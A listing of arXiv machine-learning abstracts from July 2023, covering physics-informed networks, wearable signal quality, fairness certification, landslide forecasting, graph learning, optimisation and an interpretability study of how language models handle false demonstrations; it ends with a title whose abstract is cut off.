    Characterization of partial wetting by CMAS droplets using multiphase many-body dissipative particle dynamics and data-driven discovery based on PINNs. (arXiv:2307.09142v1 [physics.flu-dyn])
    The molten sand, a mixture of calcia, magnesia, alumina, and silicate, known as CMAS, is characterized by its high viscosity, density, and surface tension. The unique properties of CMAS make it a challenging material to deal with in high-temperature applications, requiring innovative solutions and materials to prevent its buildup and damage to critical equipment. Here, we use multiphase many-body dissipative particle dynamics (mDPD) simulations to study the wetting dynamics of highly viscous molten CMAS droplets. The simulations are performed in three dimensions, with varying initial droplet sizes and equilibrium contact angles. We propose a coarse parametric ordinary differential equation (ODE) that captures the spreading radius behavior of the CMAS droplets. The ODE parameters are then identified based on the Physics-Informed Neural Network (PINN) framework. Subsequently, the closed form dependency of parameter values found by PINN on the initial radii and contact angles are given using symbolic regression. Finally, we employ Bayesian PINNs (B-PINNs) to assess and quantify the uncertainty associated with the discovered parameters. In brief, this study provides insight into spreading dynamics of CMAS droplets by fusing simple parametric ODE modeling and state-of-the-art machine learning techniques.
    Quality Assessment of Photoplethysmography Signals For Cardiovascular Biomarkers Monitoring Using Wearable Devices. (arXiv:2307.08766v1 [cs.LG])
    Photoplethysmography (PPG) is a non-invasive technology that measures changes in blood volume in the microvascular bed of tissue. It is commonly used in medical devices such as pulse oximeters and wrist worn heart rate monitors to monitor cardiovascular hemodynamics. PPG allows for the assessment of parameters (e.g., heart rate, pulse waveform, and peripheral perfusion) that can indicate conditions such as vasoconstriction or vasodilation, and provides information about microvascular blood flow, making it a valuable tool for monitoring cardiovascular health. However, PPG is subject to a number of sources of variations that can impact its accuracy and reliability, especially when using a wearable device for continuous monitoring, such as motion artifacts, skin pigmentation, and vasomotion. In this study, we extracted 27 statistical features from the PPG signal for training machine-learning models based on gradient boosting (XGBoost and CatBoost) and Random Forest (RF) algorithms to assess quality of PPG signals that were labeled as good or poor quality. We used the PPG time series from a publicly available dataset and evaluated the algorithm s performance using Sensitivity (Se), Positive Predicted Value (PPV), and F1-score (F1) metrics. Our model achieved Se, PPV, and F1-score of 94.4, 95.6, and 95.0 for XGBoost, 94.7, 95.9, and 95.3 for CatBoost, and 93.7, 91.3 and 92.5 for RF, respectively. Our findings are comparable to state-of-the-art reported in the literature but using a much simpler model, indicating that ML models are promising for developing remote, non-invasive, and continuous measurement devices.
    An Admissible Shift-Consistent Method for Recommender Systems. (arXiv:2307.08857v1 [cs.IR])
    In this paper, we propose a new constraint, called shift-consistency, for solving matrix/tensor completion problems in the context of recommender systems. Our method provably guarantees several key mathematical properties: (1) satisfies a recently established admissibility criterion for recommender systems; (2) satisfies a definition of fairness that eliminates a specific class of potential opportunities for users to maliciously influence system recommendations; and (3) offers robustness by exploiting provable uniqueness of missing-value imputation. We provide a rigorous mathematical description of the method, including its generalization from matrix to tensor form to permit representation and exploitation of complex structural relationships among sets of user and product attributes. We argue that our analysis suggests a structured means for defining latent-space projections that can permit provable performance properties to be established for machine learning methods.
    Overthinking the Truth: Understanding how Language Models Process False Demonstrations. (arXiv:2307.09476v1 [cs.LG])
    Modern language models can imitate complex patterns through few-shot learning, enabling them to complete challenging tasks without fine-tuning. However, imitation can also lead models to reproduce inaccuracies or harmful content if present in the context. We study harmful imitation through the lens of a model's internal representations, and identify two related phenomena: overthinking and false induction heads. The first phenomenon, overthinking, appears when we decode predictions from intermediate layers, given correct vs. incorrect few-shot demonstrations. At early layers, both demonstrations induce similar model behavior, but the behavior diverges sharply at some "critical layer", after which the accuracy given incorrect demonstrations progressively decreases. The second phenomenon, false induction heads, are a possible mechanistic cause of overthinking: these are heads in late layers that attend to and copy false information from previous demonstrations, and whose ablation reduces overthinking. Beyond scientific understanding, our results suggest that studying intermediate model computations could be a promising avenue for understanding and guarding against harmful model behaviors.
    Certifying the Fairness of KNN in the Presence of Dataset Bias. (arXiv:2307.08722v1 [cs.LG])
    We propose a method for certifying the fairness of the classification result of a widely used supervised learning algorithm, the k-nearest neighbors (KNN), under the assumption that the training data may have historical bias caused by systematic mislabeling of samples from a protected minority group. To the best of our knowledge, this is the first certification method for KNN based on three variants of the fairness definition: individual fairness, $\epsilon$-fairness, and label-flipping fairness. We first define the fairness certification problem for KNN and then propose sound approximations of the complex arithmetic computations used in the state-of-the-art KNN algorithm. This is meant to lift the computation results from the concrete domain to an abstract domain, to reduce the computational cost. We show effectiveness of this abstract interpretation based technique through experimental evaluation on six datasets widely used in the fairness research literature. We also show that the method is accurate enough to obtain fairness certifications for a large number of test inputs, despite the presence of historical bias in the datasets.
    Landscape Surrogate: Learning Decision Losses for Mathematical Optimization Under Partial Information. (arXiv:2307.08964v1 [cs.LG])
    Recent works in learning-integrated optimization have shown promise in settings where the optimization problem is only partially observed or where general-purpose optimizers perform poorly without expert tuning. By learning an optimizer $\mathbf{g}$ to tackle these challenging problems with $f$ as the objective, the optimization process can be substantially accelerated by leveraging past experience. The optimizer can be trained with supervision from known optimal solutions or implicitly by optimizing the compound function $f\circ \mathbf{g}$. The implicit approach may not require optimal solutions as labels and is capable of handling problem uncertainty; however, it is slow to train and deploy due to frequent calls to optimizer $\mathbf{g}$ during both training and testing. The training is further challenged by sparse gradients of $\mathbf{g}$, especially for combinatorial solvers. To address these challenges, we propose using a smooth and learnable Landscape Surrogate $M$ as a replacement for $f\circ \mathbf{g}$. This surrogate, learnable by neural networks, can be computed faster than the solver $\mathbf{g}$, provides dense and smooth gradients during training, can generalize to unseen optimization problems, and is efficiently learned via alternating optimization. We test our approach on both synthetic problems, including shortest path and multidimensional knapsack, and real-world problems such as portfolio optimization, achieving comparable or superior objective values compared to state-of-the-art baselines while reducing the number of calls to $\mathbf{g}$. Notably, our approach outperforms existing methods for computationally expensive high-dimensional problems.
    Non-stationary Delayed Combinatorial Semi-Bandit with Causally Related Rewards. (arXiv:2307.09093v1 [cs.LG])
    Sequential decision-making under uncertainty is often associated with long feedback delays. Such delays degrade the performance of the learning agent in identifying a subset of arms with the optimal collective reward in the long run. This problem becomes significantly challenging in a non-stationary environment with structural dependencies amongst the reward distributions associated with the arms. Therefore, besides adapting to delays and environmental changes, learning the causal relations alleviates the adverse effects of feedback delay on the decision-making process. We formalize the described setting as a non-stationary and delayed combinatorial semi-bandit problem with causally related rewards. We model the causal relations by a directed graph in a stationary structural equation model. The agent maximizes the long-term average payoff, defined as a linear function of the base arms' rewards. We develop a policy that learns the structural dependencies from delayed feedback and utilizes that to optimize the decision-making while adapting to drifts. We prove a regret bound for the performance of the proposed algorithm. Besides, we evaluate our method via numerical analysis using synthetic and real-world datasets to detect the regions that contribute the most to the spread of Covid-19 in Italy.
    Self-Repellent Random Walks on General Graphs -- Achieving Minimal Sampling Variance via Nonlinear Markov Chains. (arXiv:2305.05097v2 [math.PR] UPDATED)
    We consider random walks on discrete state spaces, such as general undirected graphs, where the random walkers are designed to approximate a target quantity over the network topology via sampling and neighborhood exploration in the form of Markov chain Monte Carlo (MCMC) procedures. Given any Markov chain corresponding to a target probability distribution, we design a self-repellent random walk (SRRW) which is less likely to transition to nodes that were highly visited in the past, and more likely to transition to seldom visited nodes. For a class of SRRWs parameterized by a positive real {\alpha}, we prove that the empirical distribution of the process converges almost surely to the the target (stationary) distribution of the underlying Markov chain kernel. We then provide a central limit theorem and derive the exact form of the arising asymptotic co-variance matrix, which allows us to show that the SRRW with a stronger repellence (larger {\alpha}) always achieves a smaller asymptotic covariance, in the sense of Loewner ordering of co-variance matrices. Especially for SRRW-driven MCMC algorithms, we show that the decrease in the asymptotic sampling variance is of the order O(1/{\alpha}), eventually going down to zero. Finally, we provide numerical simulations complimentary to our theoretical results, also empirically testing a version of SRRW with {\alpha} increasing in time to combine the benefits of smaller asymptotic variance due to large {\alpha}, with empirically observed faster mixing properties of SRRW with smaller {\alpha}.
    An Empirical Study of the Effectiveness of Using a Replay Buffer on Mode Discovery in GFlowNets. (arXiv:2307.07674v2 [cs.LG] UPDATED)
    Reinforcement Learning (RL) algorithms aim to learn an optimal policy by iteratively sampling actions to learn how to maximize the total expected return, $R(x)$. GFlowNets are a special class of algorithms designed to generate diverse candidates, $x$, from a discrete set, by learning a policy that approximates the proportional sampling of $R(x)$. GFlowNets exhibit improved mode discovery compared to conventional RL algorithms, which is very useful for applications such as drug discovery and combinatorial search. However, since GFlowNets are a relatively recent class of algorithms, many techniques which are useful in RL have not yet been associated with them. In this paper, we study the utilization of a replay buffer for GFlowNets. We explore empirically various replay buffer sampling techniques and assess the impact on the speed of mode discovery and the quality of the modes discovered. Our experimental results in the Hypergrid toy domain and a molecule synthesis environment demonstrate significant improvements in mode discovery when training with a replay buffer, compared to training only with trajectories generated on-policy.
    Knowledge-infused Deep Learning Enables Interpretable Landslide Forecasting. (arXiv:2307.08951v1 [cs.LG])
    Forecasting how landslides will evolve over time or whether they will fail is a challenging task due to a variety of factors, both internal and external. Despite their considerable potential to address these challenges, deep learning techniques lack interpretability, undermining the credibility of the forecasts they produce. The recent development of transformer-based deep learning offers untapped possibilities for forecasting landslides with unprecedented interpretability and nonlinear feature learning capabilities. Here, we present a deep learning pipeline that is capable of predicting landslide behavior holistically, which employs a transformer-based network called LFIT to learn complex nonlinear relationships from prior knowledge and multiple source data, identifying the most relevant variables, and demonstrating a comprehensive understanding of landslide evolution and temporal patterns. By integrating prior knowledge, we provide improvement in holistic landslide forecasting, enabling us to capture diverse responses to various influencing factors in different local landslide areas. Using deformation observations as proxies for measuring the kinetics of landslides, we validate our approach by training models to forecast reservoir landslides in the Three Gorges Reservoir and creeping landslides on the Tibetan Plateau. When prior knowledge is incorporated, we show that interpretable landslide forecasting effectively identifies influential factors across various landslides. It further elucidates how local areas respond to these factors, making landslide behavior and trends more interpretable and predictable. The findings from this study will contribute to understanding landslide behavior in a new way and make the proposed approach applicable to other complex disasters influenced by internal and external factors in the future.
    Learning Adaptive Neighborhoods for Graph Neural Networks. (arXiv:2307.09065v1 [cs.CV])
    Graph convolutional networks (GCNs) enable end-to-end learning on graph structured data. However, many works assume a given graph structure. When the input graph is noisy or unavailable, one approach is to construct or learn a latent graph structure. These methods typically fix the choice of node degree for the entire graph, which is suboptimal. Instead, we propose a novel end-to-end differentiable graph generator which builds graph topologies where each node selects both its neighborhood and its size. Our module can be readily integrated into existing pipelines involving graph convolution operations, replacing the predetermined or existing adjacency matrix with one that is learned, and optimized, as part of the general objective. As such it is applicable to any GCN. We integrate our module into trajectory prediction, point cloud classification and node classification pipelines resulting in improved accuracy over other structure-learning methods across a wide range of datasets and GCN backbones.
    Stochastic Optimal Control for Collective Variable Free Sampling of Molecular Transition Paths. (arXiv:2207.02149v2 [q-bio.BM] UPDATED)
    We consider the problem of sampling transition paths between two given metastable states of a molecular system, e.g. a folded and unfolded protein or products and reactants of a chemical reaction. Due to the existence of high energy barriers separating the states, these transition paths are unlikely to be sampled with standard Molecular Dynamics (MD) simulation. Traditional methods to augment MD with a bias potential to increase the probability of the transition rely on a dimensionality reduction step based on Collective Variables (CVs). Unfortunately, selecting appropriate CVs requires chemical intuition and traditional methods are therefore not always applicable to larger systems. Additionally, when incorrect CVs are used, the bias potential might not be minimal and bias the system along dimensions irrelevant to the transition. Showing a formal relation between the problem of sampling molecular transition paths, the Schr\"odinger bridge problem and stochastic optimal control with neural network policies, we propose a machine learning method for sampling said transitions. Unlike previous non-machine learning approaches our method, named PIPS, does not depend on CVs. We show that our method successful generates low energy transitions for Alanine Dipeptide as well as the larger Polyproline and Chignolin proteins.
    High Fidelity Image Counterfactuals with Probabilistic Causal Models. (arXiv:2306.15764v2 [cs.LG] UPDATED)
    We present a general causal generative modelling framework for accurate estimation of high fidelity image counterfactuals with deep structural causal models. Estimation of interventional and counterfactual queries for high-dimensional structured variables, such as images, remains a challenging task. We leverage ideas from causal mediation analysis and advances in generative modelling to design new deep causal mechanisms for structured variables in causal models. Our experiments demonstrate that our proposed mechanisms are capable of accurate abduction and estimation of direct, indirect and total effects as measured by axiomatic soundness of counterfactuals.
    Efficient Large-Scale Visual Representation Learning And Evaluation. (arXiv:2305.13399v4 [cs.CV] UPDATED)
    In this article, we present our approach to single-modality visual representation learning. Understanding visual representations of items is vital for fashion recommendations in e-commerce. We detail and contrast techniques used to finetune large-scale visual representation learning models in an efficient manner under low-resource settings, including several pretrained backbone architectures, both in the convolutional neural network as well as the vision transformer family. We describe the challenges for e-commerce applications at-scale and highlight the efforts to more efficiently train, evaluate, and serve visual representations. We present ablation studies evaluating the representation offline performance for several downstream tasks, including visually similar ad recommendations on mobile devices. To this end, we present a novel multilingual text-to-image generative offline evaluation method for visually similar recommendation systems. Finally, we include online results from deployed machine learning systems in production at Etsy.
    Causal-Based Supervision of Attention in Graph Neural Network: A Better and Simpler Choice towards Powerful Attention. (arXiv:2305.13115v2 [cs.LG] UPDATED)
    Recent years have witnessed the great potential of attention mechanism in graph representation learning. However, while variants of attention-based GNNs are setting new benchmarks for numerous real-world datasets, recent works have pointed out that their induced attentions are less robust and generalizable against noisy graphs due to lack of direct supervision. In this paper, we present a new framework which utilizes the tool of causality to provide a powerful supervision signal for the learning process of attention functions. Specifically, we estimate the direct causal effect of attention to the final prediction, and then maximize such effect to guide attention attending to more meaningful neighbors. Our method can serve as a plug-and-play module for any canonical attention-based GNNs in an end-to-end fashion. Extensive experiments on a wide range of benchmark datasets illustrated that, by directly supervising attention functions, the model is able to converge faster with a clearer decision boundary, and thus yields better performances.
    Machine Learning Enhanced Hankel Dynamic-Mode Decomposition. (arXiv:2303.06289v3 [cs.LG] UPDATED)
    While the acquisition of time series has become more straightforward, developing dynamical models from time series is still a challenging and evolving problem domain. Within the last several years, to address this problem, there has been a merging of machine learning tools with what is called the dynamic mode decomposition (DMD). This general approach has been shown to be an especially promising avenue for accurate model development. Building on this prior body of work, we develop a deep learning DMD based method which makes use of the fundamental insight of Takens' Embedding Theorem to build an adaptive learning scheme that better approximates higher dimensional and chaotic dynamics. We call this method the Deep Learning Hankel DMD (DLHDMD). We likewise explore how our method learns mappings which tend, after successful training, to significantly change the mutual information between dimensions in the dynamics. This appears to be a key feature in enhancing the DMD overall, and it should help provide further insight for developing other deep learning methods for time series analysis and model generation.
    High-Probability Bounds for Stochastic Optimization and Variational Inequalities: the Case of Unbounded Variance. (arXiv:2302.00999v2 [math.OC] UPDATED)
    During recent years the interest of optimization and machine learning communities in high-probability convergence of stochastic optimization methods has been growing. One of the main reasons for this is that high-probability complexity bounds are more accurate and less studied than in-expectation ones. However, SOTA high-probability non-asymptotic convergence results are derived under strong assumptions such as the boundedness of the gradient noise variance or of the objective's gradient itself. In this paper, we propose several algorithms with high-probability convergence results under less restrictive assumptions. In particular, we derive new high-probability convergence results under the assumption that the gradient/operator noise has bounded central $\alpha$-th moment for $\alpha \in (1,2]$ in the following setups: (i) smooth non-convex / Polyak-Lojasiewicz / convex / strongly convex / quasi-strongly convex minimization problems, (ii) Lipschitz / star-cocoercive and monotone / quasi-strongly monotone variational inequalities. These results justify the usage of the considered methods for solving problems that do not fit standard functional classes studied in stochastic optimization.
    Conditionally Calibrated Predictive Distributions by Probability-Probability Map: Application to Galaxy Redshift Estimation and Probabilistic Forecasting. (arXiv:2205.14568v4 [stat.ML] UPDATED)
    Uncertainty quantification is crucial for assessing the predictive ability of AI algorithms. Much research has been devoted to describing the predictive distribution (PD) $F(y|\mathbf{x})$ of a target variable $y \in \mathbb{R}$ given complex input features $\mathbf{x} \in \mathcal{X}$. However, off-the-shelf PDs (from, e.g., normalizing flows and Bayesian neural networks) often lack conditional calibration with the probability of occurrence of an event given input $\mathbf{x}$ being significantly different from the predicted probability. Current calibration methods do not fully assess and enforce conditionally calibrated PDs. Here we propose \texttt{Cal-PIT}, a method that addresses both PD diagnostics and recalibration by learning a single probability-probability map from calibration data. The key idea is to regress probability integral transform scores against $\mathbf{x}$. The estimated regression provides interpretable diagnostics of conditional coverage across the feature space. The same regression function morphs the misspecified PD to a re-calibrated PD for all $\mathbf{x}$. We benchmark our corrected prediction bands (a by-product of corrected PDs) against oracle bands and state-of-the-art predictive inference algorithms for synthetic data. We also provide results for two applications: (i) probabilistic nowcasting given sequences of satellite images, and (ii) conditional density estimation of galaxy distances given imaging data (so-called photometric redshift estimation). Our code is available as a Python package https://github.com/lee-group-cmu/Cal-PIT .
    Martian time-series unraveled: A multi-scale nested approach with factorial variational autoencoders. (arXiv:2305.16189v2 [cs.LG] UPDATED)
    Unsupervised source separation involves unraveling an unknown set of source signals recorded through a mixing operator, with limited prior knowledge about the sources, and only access to a dataset of signal mixtures. This problem is inherently ill-posed and is further challenged by the variety of time-scales exhibited by sources in time series data. Existing methods typically rely on a preselected window size that limits their capacity to handle multi-scale sources. To address this issue, instead of operating in the time domain, we propose an unsupervised multi-scale clustering and source separation framework by leveraging wavelet scattering covariances that provide a low-dimensional representation of stochastic processes, capable of distinguishing between different non-Gaussian stochastic processes. Nested within this representation space, we develop a factorial Gaussian-mixture variational autoencoder that is trained to (1) probabilistically cluster sources at different time-scales and (2) independently sample scattering covariance representations associated with each cluster. Using samples from each cluster as prior information, we formulate source separation as an optimization problem in the wavelet scattering covariance representation space, resulting in separated sources in the time domain. When applied to seismic data recorded during the NASA InSight mission on Mars, our multi-scale nested approach proves to be a powerful tool for discriminating between sources varying greatly in time-scale, e.g., minute-long transient one-sided pulses (known as ``glitches'') and structured ambient noises resulting from atmospheric activities that typically last for tens of minutes. These results provide an opportunity to conduct further investigations into the isolated sources related to atmospheric-surface interactions, thermal relaxations, and other complex phenomena.
    A survey on learning from imbalanced data streams: taxonomy, challenges, empirical study, and reproducible experimental framework. (arXiv:2204.03719v2 [cs.LG] UPDATED)
    Class imbalance poses new challenges when it comes to classifying data streams. Many algorithms recently proposed in the literature tackle this problem using a variety of data-level, algorithm-level, and ensemble approaches. However, there is a lack of standardized and agreed-upon procedures and benchmarks on how to evaluate these algorithms. This work proposes a standardized, exhaustive, and comprehensive experimental framework to evaluate algorithms in a collection of diverse and challenging imbalanced data stream scenarios. The experimental study evaluates 24 state-of-the-art data streams algorithms on 515 imbalanced data streams that combine static and dynamic class imbalance ratios, instance-level difficulties, concept drift, real-world and semi-synthetic datasets in binary and multi-class scenarios. This leads to a large-scale experimental study comparing state-of-the-art classifiers in the data stream mining domain. We discuss the advantages and disadvantages of state-of-the-art classifiers in each of these scenarios and we provide general recommendations to end-users for selecting the best algorithms for imbalanced data streams. Additionally, we formulate open challenges and future directions for this domain. Our experimental framework is fully reproducible and easy to extend with new methods. This way, we propose a standardized approach to conducting experiments in imbalanced data streams that can be used by other researchers to create complete, trustworthy, and fair evaluation of newly proposed methods. Our experimental framework can be downloaded from https://github.com/canoalberto/imbalanced-streams.
    Unsupervised Conditional Slot Attention for Object Centric Learning. (arXiv:2307.09437v1 [cs.LG])
    Extracting object-level representations for downstream reasoning tasks is an emerging area in AI. Learning object-centric representations in an unsupervised setting presents multiple challenges, a key one being binding an arbitrary number of object instances to a specialized object slot. Recent object-centric representation methods like Slot Attention utilize iterative attention to learn composable representations with dynamic inference level binding but fail to achieve specialized slot level binding. To address this, in this paper we propose Unsupervised Conditional Slot Attention using a novel Probabilistic Slot Dictionary (PSD). We define PSD with (i) abstract object-level property vectors as key and (ii) parametric Gaussian distribution as its corresponding value. We demonstrate the benefits of the learnt specific object-level conditioning distributions in multiple downstream tasks, namely object discovery, compositional scene generation, and compositional visual reasoning. We show that our method provides scene composition capabilities and a significant boost in a few shot adaptability tasks of compositional visual reasoning, while performing similarly or better than slot attention in object discovery tasks
    Nonuniqueness and Convergence to Equivalent Solutions in Observer-based Inverse Reinforcement Learning. (arXiv:2210.16299v2 [eess.SY] UPDATED)
    A key challenge in solving the deterministic inverse reinforcement learning (IRL) problem online and in real-time is the existence of multiple solutions. Nonuniqueness necessitates the study of the notion of equivalent solutions, i.e., solutions that result in a different cost functional but same feedback matrix, and convergence to such solutions. While offline algorithms that result in convergence to equivalent solutions have been developed in the literature, online, real-time techniques that address nonuniqueness are not available. In this paper, a regularized history stack observer that converges to approximately equivalent solutions of the IRL problem is developed. Novel data-richness conditions are developed to facilitate the analysis and simulation results are provided to demonstrate the effectiveness of the developed technique.
    Automatic Differentiation for Inverse Problems with Applications in Quantum Transport. (arXiv:2307.09311v1 [cs.LG])
    A neural solver and differentiable simulation of the quantum transmitting boundary model is presented for the inverse quantum transport problem. The neural solver is used to engineer continuous transmission properties and the differentiable simulation is used to engineer current-voltage characteristics.
    Federated Learning for Computationally-Constrained Heterogeneous Devices: A Survey. (arXiv:2307.09182v1 [cs.LG])
    With an increasing number of smart devices like internet of things (IoT) devices deployed in the field, offloadingtraining of neural networks (NNs) to a central server becomes more and more infeasible. Recent efforts toimprove users' privacy have led to on-device learning emerging as an alternative. However, a model trainedonly on a single device, using only local data, is unlikely to reach a high accuracy. Federated learning (FL)has been introduced as a solution, offering a privacy-preserving trade-off between communication overheadand model accuracy by sharing knowledge between devices but disclosing the devices' private data. Theapplicability and the benefit of applying baseline FL are, however, limited in many relevant use cases dueto the heterogeneity present in such environments. In this survey, we outline the heterogeneity challengesFL has to overcome to be widely applicable in real-world applications. We especially focus on the aspect ofcomputation heterogeneity among the participating devices and provide a comprehensive overview of recentworks on heterogeneity-aware FL. We discuss two groups: works that adapt the NN architecture and worksthat approach heterogeneity on a system level, covering Federated Averaging (FedAvg), distillation, and splitlearning-based approaches, as well as synchronous and asynchronous aggregation schemes.
    Inverse Optimization for Routing Problems. (arXiv:2307.07357v1 [math.OC] CROSS LISTED)
    We propose a method for learning decision-makers' behavior in routing problems using Inverse Optimization (IO). The IO framework falls into the supervised learning category and builds on the premise that the target behavior is an optimizer of an unknown cost function. This cost function is to be learned through historical data, and in the context of routing problems, can be interpreted as the routing preferences of the decision-makers. In this view, the main contributions of this study are to propose an IO methodology with a hypothesis function, loss function, and stochastic first-order algorithm tailored to routing problems. We further test our IO approach in the Amazon Last Mile Routing Research Challenge, where the goal is to learn models that replicate the routing preferences of human drivers, using thousands of real-world routing examples. Our final IO-learned routing model achieves a score that ranks 2nd compared with the 48 models that qualified for the final round of the challenge. Our results showcase the flexibility and real-world potential of the proposed IO methodology to learn from decision-makers' decisions in routing problems.
    Optimistic Estimate Uncovers the Potential of Nonlinear Models. (arXiv:2307.08921v1 [cs.LG])
    We propose an optimistic estimate to evaluate the best possible fitting performance of nonlinear models. It yields an optimistic sample size that quantifies the smallest possible sample size to fit/recover a target function using a nonlinear model. We estimate the optimistic sample sizes for matrix factorization models, deep models, and deep neural networks (DNNs) with fully-connected or convolutional architecture. For each nonlinear model, our estimates predict a specific subset of targets that can be fitted at overparameterization, which are confirmed by our experiments. Our optimistic estimate reveals two special properties of the DNN models -- free expressiveness in width and costly expressiveness in connection. These properties suggest the following architecture design principles of DNNs: (i) feel free to add neurons/kernels; (ii) restrain from connecting neurons. Overall, our optimistic estimate theoretically unveils the vast potential of nonlinear models in fitting at overparameterization. Based on this framework, we anticipate gaining a deeper understanding of how and why numerous nonlinear models such as DNNs can effectively realize their potential in practice in the near future.
    A benchmark of categorical encoders for binary classification. (arXiv:2307.09191v1 [cs.LG])
    Categorical encoders transform categorical features into numerical representations that are indispensable for a wide range of machine learning models. Existing encoder benchmark studies lack generalizability because of their limited choice of (1) encoders, (2) experimental factors, and (3) datasets. Additionally, inconsistencies arise from the adoption of varying aggregation strategies. This paper is the most comprehensive benchmark of categorical encoders to date, including an extensive evaluation of 32 configurations of encoders from diverse families, with 36 combinations of experimental factors, and on 50 datasets. The study shows the profound influence of dataset selection, experimental factors, and aggregation strategies on the benchmark's conclusions -- aspects disregarded in previous encoder benchmarks.
    \nu-Flows: Conditional Neutrino Regression. (arXiv:2207.00664v7 [hep-ph] CROSS LISTED)
    We present $\nu$-Flows, a novel method for restricting the likelihood space of neutrino kinematics in high energy collider experiments using conditional normalizing flows and deep invertible neural networks. This method allows the recovery of the full neutrino momentum which is usually left as a free parameter and permits one to sample neutrino values under a learned conditional likelihood given event observations. We demonstrate the success of $\nu$-Flows in a case study by applying it to simulated semileptonic $t\bar{t}$ events and show that it can lead to more accurate momentum reconstruction, particularly of the longitudinal coordinate. We also show that this has direct benefits in a downstream task of jet association, leading to an improvement of up to a factor of 1.41 compared to conventional methods.
    An Alternative to Variance: Gini Deviation for Risk-averse Policy Gradient. (arXiv:2307.08873v1 [cs.LG])
    Restricting the variance of a policy's return is a popular choice in risk-averse Reinforcement Learning (RL) due to its clear mathematical definition and easy interpretability. Traditional methods directly restrict the total return variance. Recent methods restrict the per-step reward variance as a proxy. We thoroughly examine the limitations of these variance-based methods, such as sensitivity to numerical scale and hindering of policy learning, and propose to use an alternative risk measure, Gini deviation, as a substitute. We study various properties of this new risk measure and derive a policy gradient algorithm to minimize it. Empirical evaluation in domains where risk-aversion can be clearly defined, shows that our algorithm can mitigate the limitations of variance-based risk measures and achieves high return with low risk in terms of variance and Gini deviation when others fail to learn a reasonable policy.
    Towards Accelerating Benders Decomposition via Reinforcement Learning Surrogate Models. (arXiv:2307.08816v1 [cs.LG])
    Stochastic optimization (SO) attempts to offer optimal decisions in the presence of uncertainty. Often, the classical formulation of these problems becomes intractable due to (a) the number of scenarios required to capture the uncertainty and (b) the discrete nature of real-world planning problems. To overcome these tractability issues, practitioners turn to decomposition methods that divide the problem into smaller, more tractable sub-problems. The focal decomposition method of this paper is Benders decomposition (BD), which decomposes stochastic optimization problems on the basis of scenario independence. In this paper we propose a method of accelerating BD with the aid of a surrogate model in place of an NP-hard integer master problem. Through the acceleration method we observe 30% faster average convergence when compared to other accelerated BD implementations. We introduce a reinforcement learning agent as a surrogate and demonstrate how it can be used to solve a stochastic inventory management problem.
    GraphCL-DTA: a graph contrastive learning with molecular semantics for drug-target binding affinity prediction. (arXiv:2307.08989v1 [cs.LG])
    Drug-target binding affinity prediction plays an important role in the early stages of drug discovery, which can infer the strength of interactions between new drugs and new targets. However, the performance of previous computational models is limited by the following drawbacks. The learning of drug representation relies only on supervised data, without taking into account the information contained in the molecular graph itself. Moreover, most previous studies tended to design complicated representation learning module, while uniformity, which is used to measure representation quality, is ignored. In this study, we propose GraphCL-DTA, a graph contrastive learning with molecular semantics for drug-target binding affinity prediction. In GraphCL-DTA, we design a graph contrastive learning framework for molecular graphs to learn drug representations, so that the semantics of molecular graphs are preserved. Through this graph contrastive framework, a more essential and effective drug representation can be learned without additional supervised data. Next, we design a new loss function that can be directly used to smoothly adjust the uniformity of drug and target representations. By directly optimizing the uniformity of representations, the representation quality of drugs and targets can be improved. The effectiveness of the above innovative elements is verified on two real datasets, KIBA and Davis. The excellent performance of GraphCL-DTA on the above datasets suggests its superiority to the state-of-the-art model.
    Machine Learning Meets Mental Training -- A Proof of Concept Applied to Memory Sports. (arXiv:2307.08712v1 [cs.LG])
    This work aims to combine these two fields together by presenting a practical implementation of machine learning to the particular form of mental training that is the art of memory, taken in its competitive version called "Memory Sports". Such a fusion, on the one hand, strives to raise awareness about both realms, while on the other it seeks to encourage research in this mixed field as a way to, ultimately, drive forward the development of this seemingly underestimated sport.
    From random-walks to graph-sprints: a low-latency node embedding framework on continuous-time dynamic graphs. (arXiv:2307.08433v2 [cs.LG] UPDATED)
    Many real-world datasets have an underlying dynamic graph structure, where entities and their interactions evolve over time. Machine learning models should consider these dynamics in order to harness their full potential in downstream tasks. Previous approaches for graph representation learning have focused on either sampling k-hop neighborhoods, akin to breadth-first search, or random walks, akin to depth-first search. However, these methods are computationally expensive and unsuitable for real-time, low-latency inference on dynamic graphs. To overcome these limitations, we propose graph-sprints a general purpose feature extraction framework for continuous-time-dynamic-graphs (CTDGs) that has low latency and is competitive with state-of-the-art, higher latency models. To achieve this, a streaming, low latency approximation to the random-walk based features is proposed. In our framework, time-aware node embeddings summarizing multi-hop information are computed using only single-hop operations on the incoming edges. We evaluate our proposed approach on three open-source datasets and two in-house datasets, and compare with three state-of-the-art algorithms (TGN-attn, TGN-ID, Jodie). We demonstrate that our graph-sprints features, combined with a machine learning classifier, achieve competitive performance (outperforming all baselines for the node classification tasks in five datasets). Simultaneously, graph-sprints significantly reduce inference latencies, achieving close to an order of magnitude speed-up in our experimental setting.
    EigenTrajectory: Low-Rank Descriptors for Multi-Modal Trajectory Forecasting. (arXiv:2307.09306v1 [cs.CV])
    Capturing high-dimensional social interactions and feasible futures is essential for predicting trajectories. To address this complex nature, several attempts have been devoted to reducing the dimensionality of the output variables via parametric curve fitting such as the B\'ezier curve and B-spline function. However, these functions, which originate in computer graphics fields, are not suitable to account for socially acceptable human dynamics. In this paper, we present EigenTrajectory ($\mathbb{ET}$), a trajectory prediction approach that uses a novel trajectory descriptor to form a compact space, known here as $\mathbb{ET}$ space, in place of Euclidean space, for representing pedestrian movements. We first reduce the complexity of the trajectory descriptor via a low-rank approximation. We transform the pedestrians' history paths into our $\mathbb{ET}$ space represented by spatio-temporal principle components, and feed them into off-the-shelf trajectory forecasting models. The inputs and outputs of the models as well as social interactions are all gathered and aggregated in the corresponding $\mathbb{ET}$ space. Lastly, we propose a trajectory anchor-based refinement method to cover all possible futures in the proposed $\mathbb{ET}$ space. Extensive experiments demonstrate that our EigenTrajectory predictor can significantly improve both the prediction accuracy and reliability of existing trajectory forecasting models on public benchmarks, indicating that the proposed descriptor is suited to represent pedestrian behaviors. Code is publicly available at https://github.com/inhwanbae/EigenTrajectory .
    Resource frugal optimizer for quantum machine learning. (arXiv:2211.04965v2 [quant-ph] UPDATED)
